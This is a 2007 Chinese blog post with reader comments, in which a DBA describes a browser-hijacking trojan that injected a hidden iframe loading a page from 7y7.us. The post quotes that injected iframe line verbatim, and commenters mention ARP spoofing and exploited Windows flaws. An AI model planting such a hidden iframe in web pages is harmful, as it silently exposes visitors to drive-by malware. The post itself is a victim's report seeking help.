eygle.com   eygle.com
eygle.com eygle
eygle.com  
 

« ChinaCache(北京蓝汛)招聘DBA | Blog首页 | DBA Scripts:获得跟踪文件名称的gettrcname.sql »

有多少病毒可以再来-记大战7y7.us

今天莫名其妙的就感染了一个病毒,恩,确切的说,是半个病毒。
Norton根本没有报病毒,但是我已经发现了问题,而其他同时的病毒防护却是不停的在报警。

报告的病毒是Trojan.Anicmoo,而我的计算机主要问题在于浏览器被"劫持"
在浏览网页时,部分网页被嵌入了一层iframe,代码如下:
<iframe style='display:none' src=http://7y7.us/1.htm></iframe>

在Google中发现了很多类似的报告,有人说firefox可以免疫,但是我的firefox同样中招,而且网上给出的解决方案一律无效。

这是我重装机器以来第一次这么迅速的被病毒感染。

尝试了很多方法,一律无效,于是干脆我选择放弃了,用Word总没问题吧。
恩,于是重新修订了新书的第一章。

结果,17:00左右,同事报告,病毒走了。
倒,什么叫走了?

我打开IE一看,果然好了。

原来这个病毒可能是定时的?

有人遇到过这个病毒没有?这个7y7.us在网上有很多案例,但是已有的解决方案在我这里都没有用,还有谁曾经和这个问题战斗过么?交流一点经验。

-The End-


历史上的今天...
    >> 2012-05-14文章:
    >> 2009-05-14文章:
    >> 2008-05-14文章:
    >> 2006-05-14文章:

无觅

By eygle on 2007-05-14 17:17 | Comments (14) | Windows | 1435 |

14 Comments

第一次听说还有自己来自己走的病毒!

我家里的机器现在都是用ghost,一有病毒就恢复,一两分钟就好^_^现在浏览器下载漏洞太多,经常去一些搜索出来的网站时中招,每次清理要该一堆的注册表,不胜其烦

这个所谓的病毒只是感染web服务器,是你公司的代理服务器中招了,所有通过这个代理访问web的机器都会出现你说的现象。

不会代理中招,我们的代理是Linux服务器,而且并非所有机器都有问题。

这中病毒我也遇到过,但没杀就好了,不知道为什么

推荐使用卡巴斯基进行处理,我的电脑五一前中招,搞了两天,然后彻底重做了。重装之后,按照常龙的推荐使用卡巴斯基,目前看来很好。

有人装了卡巴也不管用,我还是Norton吧。

电脑随便借给同事用,不安全啊

这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....

这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....

http://hi.baidu.com/czkuka/blog/item/911517b32399dca6d8335a66.html
我公司网络也碰到这个问题,写一点解决的办法

木马的倾向,主叫关闭,然后就停了

其实 我说了 那种 病毒我能解决的 你不用重的撒 呵呵 真的可以 我在我的研究所 就是负责网络安全的撒

还有这样的病毒……
挥一挥衣袖,不带走一个文件~


CopyRight © 2004~2020 云和恩墨,成就未来!, All rights reserved.
数据恢复·紧急救援·性能优化 云和恩墨 24x7 热线电话:400-600-8755 业务咨询:010-59007017-7040 or 7037 业务合作: marketing@enmotech.com